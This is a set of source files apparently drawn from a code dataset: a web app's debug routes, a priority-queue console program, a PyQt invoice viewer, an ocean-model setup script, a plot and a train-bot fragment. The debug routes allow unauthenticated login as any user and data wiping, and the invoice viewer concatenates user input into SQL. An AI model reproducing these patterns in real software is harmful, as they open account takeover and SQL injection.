random queries\n for num in range(random.randint(1, 15)):\n #await history.add(user_id, 'query', random.choice(queries))\n pass\n\n # generate random video history\n for num in range(random.randint(1, 50)):\n video_id = random.choice(random_videos)\n video_ids.append(video_id)\n if random.random() > .5:\n folder_id = random.choice(folders)\n await playlists.add(user_id, folder_id, video_id)\n #await history.add(user_id, 'video', video_id)\n\n # generate random comments\n if random.random() > .3:\n words = random.choice(paragraphs).split()\n words = words[:random.randint(3, len(words) + 1)]\n if random.random() > .5:\n words = []\n comment_id = await comments.add(user_id, video_id, ' '.join(words))\n comment_item = await comments.get(comment_id)\n # share comment\n for other_id in friend_ids:\n if random.random() > .5:\n await shares.add(video_id, comment_id, {'thumbnail': 'https://i.ytimg.com/vi/%s/mqdefault.jpg' % video_id, 'text': comment_item['text']}, user_id, other_id)\n\n \n tasks = [populate_one_user(user_id) for user_id in user_ids]\n await asyncio.gather(*tasks)\n\n print(len(video_ids))\n async def populate_one_video_batch(start):\n async for item in youtube.video(video_ids[start: start + 25]):\n print(item['id'], item['snippet']['title'])\n await videos.add(video_id=item['id'], thumbnail=item['snippet']['thumbnails']['medium']['url'], title=item['snippet']['title'])\n tasks = [populate_one_video_batch(batch) for batch in range(0, len(video_ids), 25)]\n await asyncio.gather(*tasks)\n\n # also add a newbie user to test blank pages\n newbie = await users.add(password='newbie', email='newbie@newbie.com', name='newbie', picture='https://spikeybits.com/wp-content/uploads/2016/08/hello_my_name_is_newbie.png', origin='generated')\n\n raise web.HTTPFound('/login')\n\n@routes.get('/debug:users')\n@aiohttp_jinja2.template('user_list.html')\nasync def debug_users(request):\n result = []\n for user in await users.list():\n user['href'] = '/debug:login/' + str(user['_id'])\n result.append(user)\n return {'users': result}\n\n@routes.get('/debug:login/{user_id}')\n@aiohttp_jinja2.template('login.html')\nasync def debug_login(request):\n user_id = to_objectid(request.match_info['user_id'])\n user = await users.get(user_id)\n if user is not None:\n session = await new_session(request)\n session['user_id'] = str(user_id)\n await history.add(user_id, 'debug:login')\n raise web.HTTPFound('/')\n else:\n return {'error': 'invalid user_id'}\n\n@routes.get('/debug:clear')\nasync def debug_clear(request):\n session = await new_session(request)\n if 'user_id' in session:\n del session['user_id']\n import backend\n await backend.clear_all()\n raise web.HTTPFound('/')\n\n@routes.get('/debug:restart')\nasync def debug_restart(request):\n import os, sys\n os.execvp('python', ['python'] + sys.argv)\n\n@routes.get('/debug:videos')\n@aiohttp_jinja2.template('videos.html')\nasync def debug_videos(request):\n return {'videos': await videos.list()}\n\n@routes.get('/debug:history')\nasync def debug_history(request):\n result = []\n for user in await users.list():\n user_id = user['_id']\n items = await history.list(user_id)\n result.extend(items)\n def handler(obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n elif isinstance(obj, ObjectId):\n return str(obj) \n else:\n return obj\n return web.json_response(result, dumps=lambda obj: json.dumps(obj, default=handler))\n\n","sub_path":"src/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"594587741","text":"import random\nimport os\nimport re\n\nclass PriorityQueue(list):\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n\n def shiftdown(self, startpos, pos):\n newitem = self[pos] #Получение элемента данной позиции\n\n while pos > startpos: #пока данная позиция > статовой\n parentpos = (pos - 1) // 2 #Ищем индекс родителя\n parent = self[parentpos] #Ищем родителя\n if newitem < parent: #Если элемент на данной прозиции меньше родителя, то меняем их местами\n self[pos] = parent #то меняем их местами\n pos = parentpos #обновляем позицию\n continue\n break\n \n self[pos] = newitem #Возвращаем элемент на правильную позицию, если if сработал, если не сработал, то остается на месте\n\n def shiftup(self, pos):\n endpos = len(self) #Последняя позиция - длина массива\n startpos = pos #Стартовая позиция\n newitem = self[pos] #Получение элемента стартовой позиции\n \n leftpos = 2 * pos + 1 #Проверяем child для позиции\n while leftpos < endpos: #Пока позиция child < длины массива\n rightpos = leftpos + 1\n\n if rightpos < endpos and self[leftpos] > self[rightpos]: #если не конец, и левое больше правого\n leftpos = rightpos #то правый лист идет вверх\n \n self[pos] = self[leftpos] #Родитель = правому листу, если if выполнилось, и левому листу, если не выполнилось\n pos = leftpos #Позиция = правому листу, если if выполнилось, и левому листу, если не выполнилось\n leftpos = 2 * pos + 1 #Обновляем позицию и если не крайние листы цикл повторяется\n\n self[pos] = newitem #Возвращаем на правильную позицию место\n self.shiftdown(startpos, pos)\n\n def heapify(self): #Метод преобразования последовательности в кучу\n n = len(self)\n for i in reversed(range(n//2)):\n self.shiftup(i)\n \n def print(self):\n print(self)\n\n def check(self):\n return type(self)\n\n def pop_(self): #Извлечение элемента с наивысшем приоритетом\n lastelt = self.pop()\n if self:\n returnitem = self[0]\n self[0] = lastelt\n self.shiftup(0)\n return returnitem\n return lastelt\n\n def push(self, item): #Добавление элемента\n self.append(item)\n self.shiftdown(0, len(self)-1)\n\n def replace(self, item): #Замена элемента (добавлеятся данный item, удаляется элемент с наивысшем приоритетом)\n returnitem = self[0]\n self[0] = item\n self.shiftup(0)\n return returnitem\n\nclass ListComparator(list): #Сравнение по длине списка\n '''Компаратор для списков'''\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n\nclass StrComparator(str): #Сравнение по длине строки\n '''Компаратор для строк'''\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n\nclass DictComparator(dict): #Сравнение по длине значений словаря\n '''Компаратор для словарей'''\n def __gt__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v > length_o\n def __lt__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v < length_o\n def __ge__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v >= length_o\n def __le__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v <= length_o\n def __eq__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v == length_o\n\n\nclass Table(PriorityQueue): #Таблица условное название (для удобства), это просто очередь с приоритетом\n '''Компаратор для таблиц'''\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n \n def __init__(self, table_name): #Конструктор\n self.name = table_name\n self.queue = self.user_interface()\n \n def user_interface(self): #Интрефейс для взаимодействия с пользователем\n print('МЕНЮ Таблицы\\n')\n print('1. Создать очередь с приоритетом заполненную псевдослучайными числами.')\n print('2. Создать пустую очередь.')\n print('3. Добавить новый элемент.')\n print('4. Добавить несколько элементов.')\n print('5. Удалить элемент с наивысшем приоритетом.')\n print('6. Заменить элемент (т.е внести новый элемент и удалить элемент с наивысшем приоритетом).')\n print('7. Вывести на экран очередь с приоритетом.')\n print('8. Выйти\\Сохранить.')\n print('\\n')\n \n queue = [] #Нужны для проверки на пустоту\n t = 'None'\n \n while True: #Бесконечный цикл для вызова функций класса\n number = enter_element_number('Введите номер пункта меню(ТАБЛИЦЫ): ',\n 'Вы ввели не верный номер. Попробуйте еще раз')\n\n if number == 1:\n queue, t = self.create_queue() #Создание таблицы заполненное рандомными числами\n elif number == 2:\n queue, t = self.create_empty_queue() #Создать пустую таблицу с выбором типа данных\n elif number == 3:\n self.wrapper(queue, self.push_element, t) #Добавить 1 элемент\n elif number == 4:\n self.wrapper(queue, self.push_elements, t) #Добавить несколько элементов\n elif number == 5:\n self.wrapper(queue, self.pop_element, t) #Удалить элемент с наивысшим приоритетом\n elif number == 6:\n self.wrapper(queue, self.replace_element, t) #Заменить элемент с наивысшим приоритетом\n elif number == 7:\n self.wrapper(queue, self.print_queue, t) # Вывести таблицу(очередь)\n elif number == 8: #Сохранение\n print('До свидания!')\n return queue\n break\n else:\n print('Введенного номера нет в МЕНЮ. Попробуйте еще раз.')\n\n def enter_element_list(self): #Парсер ввода для элементов списка\n mass = input('Введите список объектов через запятую.' +\n '\\nЕсли хотите записать строку (пример:\"ваша_строка\")'+\n '\\nЕсли хотите записать число кавычки не нужны.'+\n '\\nЦелые числа пишутся через точку (пример: \"a\",\"bc\",5.0): ').split(',')\n \n element = []\n for i in mass: \n if re.findall(r'[0-9]+\\.[0-9]+', i) or re.findall(r'\"[0-9]+\\.[0-9]+\"', i): #Числа через точку\n try:\n element.append(float(i))\n except Exception:\n element.append(re.findall(r'\"[0-9]+\\.[0-9]+\"', i)[0][1:-1]) #Стркоа с числом\n elif re.findall(r'\"\\D+\"', i): #Поиск\n try:\n element.append(re.findall(r'\"\\D+\"', i)[0][1:-1]) #Поиск любых символов кроме цифры\n except Exception:\n continue\n elif re.findall(r'\"\\w+\"', i):\n try:\n element.append(re.findall(r'\"\\w+\"', i)[0][1:-1]) #Поиск любой буквы или части слова\n except Exception:\n continue\n else:\n try:\n element.append(i[1:-1]) #Если ничего не найдет, то это просто слово\n except Exception:\n continue\n return element\n\n def enter_element_dict(self): #Ввод элементов словаря\n size = enter_element_number('\\nВведите размер словаря, который хотите внести (целое положительно число): ') \n while True:\n try:\n element = dict([input('Введите ключ и значение через пробел: ').split() for _ in range(int(size))])\n return element\n except Exception:\n print('Не верное значение! Попробуйте сначала')\n\n def wrapper(self, queue, target, t): #Оболочка для вызова функций \n if target.__code__.co_argcount == 3: #Если 3 аргумента функции\n target(queue, t)\n else:\n target(queue) #Если не 3 аргумента у функции\n\n def check_type_wrapper(self, queue, t, target): #Проверка на тип данных, в зависимости от этого различный тип ввода\n if t == 'int' or t == 'float':\n element = enter_element_number('Введите число: ')\n if target == 'push':\n queue.push(element)\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(element)\n print('Элемент успешно заменен!')\n elif t == 'string':\n element = input('Введите строку: ')\n if target == 'push':\n queue.push(StrComparator(element))\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(StrComparator(element))\n print('Элемент успешно добавлен!')\n elif t == 'list':\n element = self.enter_element_list()\n if target == 'push':\n queue.push(ListComparator(element))\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(ListComparator(element))\n print('Элемент успешно добавлен!')\n elif t == 'dict':\n element = self.enter_element_dict()\n if target == 'push':\n queue.push(DictComparator(element))\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(DictComparator(element))\n print('Элемент успешно добавлен!')\n \n def create_queue(self): #Создание очереди с рандомными числами\n size = enter_element_number('\\nВведите размер очереди (целое положительно число): ')\n values = get_random_values(size)\n \n queue = PriorityQueue(values)\n queue.heapify()\n print('Очередь с приоритетом имеет вид: ')\n queue.print()\n \n return queue, 'int'\n\n def create_empty_queue(self): #создание очереди с указанием типа\n while True:\n t = input('Введите какой тип данных хотите хранить' +\n '\\n(string:строка, int:целое число, float:число с плавающей точкой, list:список объектов, dict:словарь): ')\n\n if t == 'float' or t == 'int' or t == 'list' or t == 'string' or t == 'dict':\n break\n else:\n print('Вы ввели не правильный тип данных, попробуйте еще раз...')\n \n queue = PriorityQueue([])\n queue.heapify()\n print('Очередь с приоритетом имеет вид: ')\n queue.print()\n print('Тип элементов: ' + t)\n \n return queue, t\n \n def push_element(self, queue, t): #Добавление\n self.check_type_wrapper(queue, t, 'push')\n \n def replace_element(self, queue, t): #Замена\n self.check_type_wrapper(queue, t, 'replace')\n\n def push_elements(self, queue, t): #Добавление нескольких элементов\n size = enter_element_number('Сколько добавляем элементов?: ')\n [self.push_element(queue, t) for _ in range(int(size))]\n\n def pop_element(self, queue): #Удаление элементов с наивысшим приоритетом, если очередь не пуста\n if len(queue) > 0:\n element = queue.pop_()\n print(f'\\nЭлемент \"{element}\" успешно удален')\n else:\n print('\\nПустая очередь!')\n\n def print_queue(self, queue): #Вывод очереди\n queue.print()\n\n\nclass Database(PriorityQueue):\n '''Класс для хранения таблиц, тип: очередь с приоритетом'''\n \n def user_interface(self): #Интерфейс для вызова методов\n print('МЕНЮ Базы данных\\n')\n print('1. Создать новую таблицу.')\n print('2. Вывести все таблицы базы данных.')\n print('3. Удалить таблицу с наивысшим приоритетом.')\n print('4. Заменить таблицу (заменяет таблицу с наивысшим приоритетом).')\n print('5. Выйти\\Сохранить.')\n print('\\n')\n \n \n while True:\n number = enter_element_number('Введите номер пункта меню(БАЗА ДАННЫХ): ',\n 'Вы ввели не верный номер. Попробуйте еще раз')\n\n if number == 1:\n self.create_table() #Создание очереди с приоритетом\n break\n elif number == 2:\n self.print_table() #Вывод базы данных\n elif number == 3:\n self.pop_table() #Удаление таблицы\n elif number == 4:\n self.replace_table() #Замена таблицы\n break\n elif number == 5: #Сохранение\n print('До свидания!')\n break\n else:\n print('Введенного номера нет в МЕНЮ. Попробуйте еще раз.')\n\n def create_table(self):\n os.system(\"cls\")\n print('Создание новой таблицы...')\n name_table = input('Введите имя новой таблицы: ')\n table = Table(name_table)\n self.push(DictComparator({name_table: table.queue}))\n os.system(\"cls\")\n self.user_interface()\n\n def print_table(self):\n print(self)\n\n def pop_table(self):\n if len(self) > 0:\n element = self.pop_()\n print(f'\\nЭлемент \"{element}\" успешно удален')\n else:\n print('\\nПустая база данных!')\n \n def replace_table(self):\n self.pop_table()\n self.create_table()\n\n\ndef get_random_values(size, minimum = 1, maximum = 100): #Получение случайных чисел 0..100\n return [random.uniform(minimum, maximum) for _ in range(int(size)) if int(size) > 0]\n\ndef create_database(): #Осноаня функция Создания базы данных\n while True:\n print('Создание новой базы данных...')\n name_database = input('\\nВведите название базы данных без пробелов: ')\n\n if len(name_database.split(' ')) == 1 and name_database != '':\n break\n else:\n print('Вы ввели недопустимое имя, попробуйте еще раз...')\n \n database = Database(PriorityQueue([])) #Создание пустой базы данных на основе Очереди с приоритетом \n print('База данных ' + name_database + ' успешно создана!')\n return database\n\ndef enter_element_number(text_input,\n text_except='Вы ввели не число. Попробуйте еще раз...'): #Функция для ввода чисел\n while True:\n try:\n element = float(input(text_input))\n return element\n except ValueError:\n print(text_except)\n \n\nif __name__ == '__main__':\n database = create_database()\n database.user_interface()\n \n '''\n list_database = []\n \n print('Cписок БАЗ ДАННЫХ\\n')\n print('1. Показать весь список баз данных.')\n print('2. Добавить новую базу данных.')\n print('3. Удалить базу данных.')\n print('4. Выйти.')\n print('\\n')\n \n while True:\n number = enter_element_number('Введите номер пункта меню: ',\n 'Вы ввели не верный номер. Попробуйте еще раз')\n if number == 1:\n print(list_database)\n elif number == 2:\n os.system(\"cls\")\n database, name_database = create_database()\n database.user_interface()\n list_database.append(DictComparator({name_database: database}))\n os.system(\"cls\")\n elif number == 3:\n key = input('Введите имя базы данных для удаления: ')\n for i in range(len(list_database)):\n for k, v in list_database[i].items():\n if k == key:\n db = list_database.pop(i)\n print(key + ' успешно удалена!')\n break\n \n elif number == 4: #Сохранение\n print('До свидания!')\n break\n else:\n print('Введенного номера нет в МЕНЮ. Попробуйте еще раз.')\n\n '''\n","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":21372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237710363","text":"import sys\nfrom modulo.Connector import *\nfrom modulo.interfaz.DetalleCompra import *\n\nclass DetalleCompra(QtGui.QDialog):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.dfc = Ui_DetallesCompra()\n self.dfc.setupUi(self)\n self.IniciarTabla()\n self.dfc.lineBuscar.setPlaceholderText(\"Ingresa lo que deseas buscar\")\n QtCore.QObject.connect(self.dfc.pushBuscar, QtCore.SIGNAL('clicked()'), self.FiltrarTabla)\n def IniciarTabla(self):\n model = QtGui.QStandardItemModel()\n model.setColumnCount(3)\n headerNames = [\"Producto\",\"Cantidad\",\"Precio\"]\n model.setHorizontalHeaderLabels(headerNames)\n self.dfc.tableView.horizontalHeader().setStretchLastSection(True)\n self.dfc.tableView.verticalHeader().setDefaultSectionSize(40)\n self.dfc.tableView.resizeRowsToContents()\n self.dfc.tableView.setModel(model)\n def FiltrarTabla(self):\n buscar = self.dfc.lineBuscar.text()\n consultor = Connector()\n consulta = \"SELECT proveedor,fecha,total FROM Factura_C WHERE ID=\"+buscar\n qvf = consultor.cur.execute(consulta)\n datosft = consultor.cur.fetchall()\n if(qvf==0):\n QtGui.QMessageBox.question(self, 'Factura no encontrada!', \"No se encontro la factura\")\n else:\n for d in datosft:\n cont=0\n row = []\n for name in d:\n cont=cont+1\n name = str(name)\n if cont==1:\n self.dfc.lineProveedor.setText(name)\n if cont==2:\n self.dfc.lineFecha.setText(name)\n if cont==3:\n self.dfc.lineTotal.setText(name)\n consulta = \"SELECT IDPROD,cantidad,precio FROM Detalle_FC WHERE IDF=\"+buscar\n consultor.cur.execute(consulta)\n datosft = consultor.cur.fetchall()\n model = QtGui.QStandardItemModel()\n model.setColumnCount(3)\n headerNames = [\"Producto\",\"Cantidad\",\"Precio\"]\n model.setHorizontalHeaderLabels(headerNames)\n for d in datosft:\n row = []\n for name in d:\n name = str(name)\n item = QtGui.QStandardItem(name)\n item.setEditable(False)\n row.append(item)\n model.appendRow(row)\n self.dfc.tableView.horizontalHeader().setStretchLastSection(True)\n self.dfc.tableView.verticalHeader().setDefaultSectionSize(40)\n self.dfc.tableView.resizeRowsToContents()\n self.dfc.tableView.setModel(model)\n","sub_path":"modulo/DetalleCompra.py","file_name":"DetalleCompra.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"37231866","text":"#!/usr/bin/env python\n'''\nThis script creates an initial condition file for MPAS-Ocean.\n'''\nimport os\nimport shutil\nimport numpy as np\nimport netCDF4 as nc\nfrom netCDF4 import Dataset\n\nLy = 3000.0e3\nLz = 4800.0\n\ndef main():\n # {{{\n\n shutil.copy2('base_mesh.nc', 'initial_state.nc')\n ds = Dataset('initial_state.nc', 'a', format='NETCDF3_64BIT_OFFSET')\n\n vertical_init(ds)\n tracer_init(ds)\n velocity_init(ds)\n coriolis_init(ds)\n others_init(ds)\n\n ds.close()\n# }}}\n\ndef vertical_init(ds):\n thicknessAllLayers = 100.0 # [m] for evenly spaced layers\n nVertLevels = int(Lz / thicknessAllLayers)\n minLayers = 3\n# {{{\n # create new variables # {{{\n ds.createDimension('nVertLevels', nVertLevels)\n refLayerThickness = ds.createVariable(\n 'refLayerThickness', np.float64, ('nVertLevels',))\n maxLevelCell = ds.createVariable('maxLevelCell', np.int32, ('nCells',))\n refBottomDepth = ds.createVariable(\n 'refBottomDepth', np.float64, ('nVertLevels',))\n refZMid = ds.createVariable('refZMid', np.float64, ('nVertLevels',))\n bottomDepth = ds.createVariable('bottomDepth', np.float64, ('nCells',))\n bottomDepthObserved = ds.createVariable(\n 'bottomDepthObserved', np.float64, ('nCells',))\n layerThickness = ds.createVariable(\n 'layerThickness', np.float64, ('Time', 'nCells', 'nVertLevels',))\n restingThickness = ds.createVariable(\n 'restingThickness', np.float64, ('nCells', 'nVertLevels',))\n vertCoordMovementWeights = ds.createVariable(\n 'vertCoordMovementWeights', np.float64, ('nVertLevels',))\n # }}}\n\n # obtain dimensions and mesh variables # {{{\n nCells = len(ds.dimensions['nCells'])\n xCell = ds.variables['xCell']\n yCell = ds.variables['yCell']\n # }}}\n\n # evenly spaced vertical grid\n refLayerThickness[:] = thicknessAllLayers\n\n # Create other variables from refLayerThickness\n refBottomDepth[0] = refLayerThickness[0]\n refZMid[0] = -0.5 * refLayerThickness[0]\n for k in range(1, nVertLevels):\n refBottomDepth[k] = refBottomDepth[k - 1] + refLayerThickness[k]\n refZMid[k] = -refBottomDepth[k - 1] - 0.5 * refLayerThickness[k]\n vertCoordMovementWeights[:] = 1.0\n\n # flat bottom, no bathymetry\n #maxLevelCell[:] = nVertLevels\n #bottomDepth[:] = refBottomDepth[nVertLevels-1]\n #bottomDepthObserved[:] = refBottomDepth[nVertLevels-1]\n # for k in range(nVertLevels):\n # layerThickness[0,:,k] = refLayerThickness[k]\n # restingThickness[:,k] = refLayerThickness[k]\n\n # Define bottom depth: parabola\n for iCell in range(0, nCells):\n x = xCell[iCell]\n y = yCell[iCell]\n bottomDepthObserved[iCell] \\\n = 1.1 * Lz * (1.0 - ((y - Ly / 2) / (Ly / 2))**2) - 100\n\n # full cells, not partial\n # initialize to very bottom:\n maxLevelCell[:] = nVertLevels\n bottomDepth[:] = refBottomDepth[nVertLevels - 1]\n for k in range(nVertLevels):\n layerThickness[0, :, k] = refLayerThickness[k]\n restingThickness[:, k] = refLayerThickness[k]\n for iCell in range(0, nCells):\n x = xCell[iCell]\n y = yCell[iCell]\n for k in range(nVertLevels):\n if bottomDepthObserved[iCell] < refBottomDepth[k]:\n maxLevelCell[iCell] = max(k, minLayers)\n bottomDepth[iCell] = refBottomDepth[maxLevelCell[iCell] - 1]\n break\n# }}}\n\ndef tracer_init(ds):\n slope = 0.001\n # temperature: linear, match slope\n Tmin = 5.0\n Tx = 0.0\n Ty = 15.0 / Ly\n Tz = Ty / slope\n\n # salinity: linear, match slope\n Smin = 15.0\n Sx = 0.0\n Sy = 15.0 / Ly\n Sz = Sy / slope\n\n # tracer1: Gaussian\n y0 = Ly / 2\n yr = Ly / 4\n z0 = -Lz / 3\n zr = Lz / 4\n# {{{\n\n # create new variables # {{{\n tracer1 = ds.createVariable(\n 'tracer1', np.float64, ('Time', 'nCells', 'nVertLevels',))\n tracer2 = ds.createVariable(\n 'tracer2', np.float64, ('Time', 'nCells', 'nVertLevels',))\n tracer3 = ds.createVariable(\n 'tracer3', np.float64, ('Time', 'nCells', 'nVertLevels',))\n temperature = ds.createVariable(\n 'temperature', np.float64, ('Time', 'nCells', 'nVertLevels',))\n salinity = ds.createVariable(\n 'salinity', np.float64, ('Time', 'nCells', 'nVertLevels',))\n layerThickness = ds.variables['layerThickness']\n # }}}\n\n # obtain dimensions and mesh variables # {{{\n nVertLevels = len(ds.dimensions['nVertLevels'])\n nCells = len(ds.dimensions['nCells'])\n xCell = ds.variables['xCell']\n yCell = ds.variables['yCell']\n refZMid = ds.variables['refZMid']\n refBottomDepth = ds.variables['refBottomDepth']\n # }}}\n for iCell in range(0, nCells):\n x = xCell[iCell]\n y = yCell[iCell]\n for k in range(0, nVertLevels):\n z = refZMid[k]\n\n temperature[0, iCell, k] \\\n = Tx * x + Ty * y + Tz * z\n salinity[0, iCell, k] \\\n = Sx * x + Sy * y + Sz * z\n tracer1[0, iCell, k] \\\n = 1.0 + np.exp(\n -((y - y0) / yr)**2\n - ((z - z0) / zr)**2)\n tracer2[0, iCell, k] = 1.0\n tracer3[0, iCell, k] = 1.0\n\n tracer2[0, iCell, 10:20] = int(2 + np.cos(y * 4 * 2 * np.pi / Ly))\n\n if ((y > Ly / 4) & (y < Ly / 2)) | (y > 3 * Ly / 4):\n tracer3[0, iCell, 0:20] = 2.0\n\n # Normalize T&S:\n temperature[:] += Tmin - np.min(temperature[:])\n salinity[:] += Smin - np.min(salinity[:])\n print(\n 'Temperature ranges from ', np.min(\n temperature[:]), ' to ', np.max(\n temperature[:]))\n print(\n 'Salinity ranges from ', np.min(\n salinity[:]), ' to ', np.max(\n salinity[:]))\n# }}}\n\ndef velocity_init(ds):\n # {{{\n normalVelocity = ds.createVariable(\n 'normalVelocity', np.float64, ('Time', 'nEdges', 'nVertLevels',))\n normalVelocity[:] = 0.0\n# }}}\n\ndef coriolis_init(ds):\n # {{{\n fEdge = ds.createVariable('fEdge', np.float64, ('nEdges',))\n fEdge[:] = 0.0\n fVertex = ds.createVariable('fVertex', np.float64, ('nVertices',))\n fVertex[:] = 0.0\n fCell = ds.createVariable('fCell', np.float64, ('nCells',))\n fCell[:] = 0.0\n# }}}\n\ndef others_init(ds):\n # {{{\n surfaceStress = ds.createVariable(\n 'surfaceStress', np.float64, ('Time', 'nEdges',))\n surfaceStress[:] = 0.0\n atmosphericPressure = ds.createVariable(\n 'atmosphericPressure', np.float64, ('Time', 'nCells',))\n atmosphericPressure[:] = 0.0\n boundaryLayerDepth = ds.createVariable(\n 'boundaryLayerDepth', np.float64, ('Time', 'nCells',))\n boundaryLayerDepth[:] = 0.0\n# }}}\n\nif __name__ == '__main__':\n # If called as a primary module, run main\n main()\n\n# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python\n","sub_path":"testing_and_setup/compass/ocean/Redi_verification/SouthernOceanSlice40/all/add_initial_state.py","file_name":"add_initial_state.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"65894798","text":"#!/usr/bin/env python3\n# coding=utf-8\n# date 2019-02-18 18:05:45\n# https://github.com/calllivecn\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nx = np.arange(0, 20, 0.1)\n\ny = np.sin(x)\n\nfig, ax = plt.subplots()\n\nax.plot(x, y)\n\n#plt.figure(\"sin函数图像\")\n\nplt.show()\n","sub_path":"matplotlib__/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"615340238","text":"import urllib.request\nimport json\nimport sqlite3\nimport time\nfrom datetime import datetime\nimport datetime\nfrom urllib import *\nimport os\n\nimport random\nimport string\n\nimport logging\nlogger = logging.getLogger(\"bot\")\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\n\nformat = \"%(asctime)s [%(levelname)s]: %(message)s\"\nlevel = logging.INFO\nlogging.basicConfig(format=format, level=level)\n\nfrom CONFIG import PLOTLY_USERNAME, PLOTLY_API_KEY\n\nimport plotly\nplotly.tools.set_credentials_file(username=PLOTLY_USERNAME, api_key=PLOTLY_API_KEY)\n\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\nconn = sqlite3.connect('OrarioTreni.db')\nc = conn.cursor()\n\nclass db:\n \"\"\"Gestisci database\"\"\"\n\n def creaTutto():\n \"\"\"Crea la la connessione e la table\"\"\"\n conn = sqlite3.connect('OrarioTreni.db')\n c = conn.cursor()\n try:\n c.execute('''CREATE TABLE stato(userid INTEGER, stato STRING, completato INTEGER)''')\n except:\n pass\n\n try:\n c.execute('''CREATE TABLE bannati(userid INTEGER)''')\n except:\n pass\n\n try:\n c.execute('''CREATE TABLE itinerario(userid INTEGER, stazione1 STRING, stazione2 STRING, orario STRING)''')\n except:\n pass\n\n try:\n c.execute('''CREATE TABLE tracciamento(request_id INTEGER, userid INTEGER, id_treno TEXT, solo_oggi BOOLEAN, stazione_ultimo_rilevamento TEXT, random_string TEXT)''')\n except:\n pass\n\n conn.commit()\n\n def updateState(userid, new_state, completato):\n try:\n c.execute('''DELETE FROM stato WHERE userid=?''',(userid,))\n c.execute('''INSERT INTO stato VALUES(?,?,?)''',(userid, new_state, completato))\n conn.commit()\n logger.info(\"Utente {} nuovo stato {}\".format(userid, new_state))\n return True, None #return \n except Exception as e:\n return False, e\n\n def getState(userid):\n try:\n c.execute('''SELECT stato, completato FROM stato WHERE userid=?''',(userid,))\n rows = c.fetchall()\n for res in rows:\n logger.debug(\"Stato dell'utente {}: {} {}\".format(userid, res[0], res[1]))\n return res[0], res[1], True, None #return \n conn.commit()\n except Exception as e:\n return None, None, False, e\n\n def resetItinerario(userid):\n c.execute('''DELETE FROM itinerario WHERE userid=?''',(userid,))\n conn.commit()\n\n def tracciaTreno(user_id, id_treno, solo_oggi):\n data, success, error = orarioTreni.cercaTreno(id_treno)\n\n stazione_ultimo_rilevamento = data['stazioneUltimoRilevamento']\n if stazione_ultimo_rilevamento == \"--\":\n stazione_ultimo_rilevamento = data['origine']\n\n if stazione_ultimo_rilevamento == data['destinazione']:\n logger.debug(\"Utente {} ha provato a tracciare il treno {} ma è già arrivato a destinazione\".format(user_id, id_treno))\n return \"Il treno è già arrivato a destinazione, traccialo domani!\"\n\n random_string = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(10))\n\n c.execute('SELECT * FROM tracciamento WHERE userid=? AND id_treno=?', (user_id, id_treno,))\n if c.fetchall():\n logger.debug(\"Utente {} ha provato a tracciare il treno {} ma lo stava già tracciando\".format(user_id, id_treno))\n return \"Stai già tracciando questo treno!\"\n\n c.execute('''SELECT request_id FROM tracciamento ORDER BY request_id DESC LIMIT 1''')\n rows = c.fetchall()\n if not rows:\n request_id = 0\n for res in rows:\n request_id = res[0] + 1\n\n c.execute('''INSERT INTO tracciamento VALUES(?, ?, ?, ?, ?, ?)''', (request_id, user_id, id_treno, solo_oggi, stazione_ultimo_rilevamento, random_string))\n conn.commit()\n\n logger.info(\"Utente {} ha messo a tracciare il treno {}, request id {}\".format(user_id, id_treno, request_id))\n return request_id\n\nclass orarioTreni:\n \"\"\"Cerca treni, arrivi, partenze, itinerari, statistiche\"\"\"\n def tipo(stringa):\n data, success, error = orarioTreni.cercaTreno(stringa)\n if success == True:\n return \"treno\"\n\n esiste, data = orarioTreni.stazione.check(stringa)\n if esiste == True:\n return \"stazione\"\n\n if stringa.find('-') > 0: #Formato itinerario: 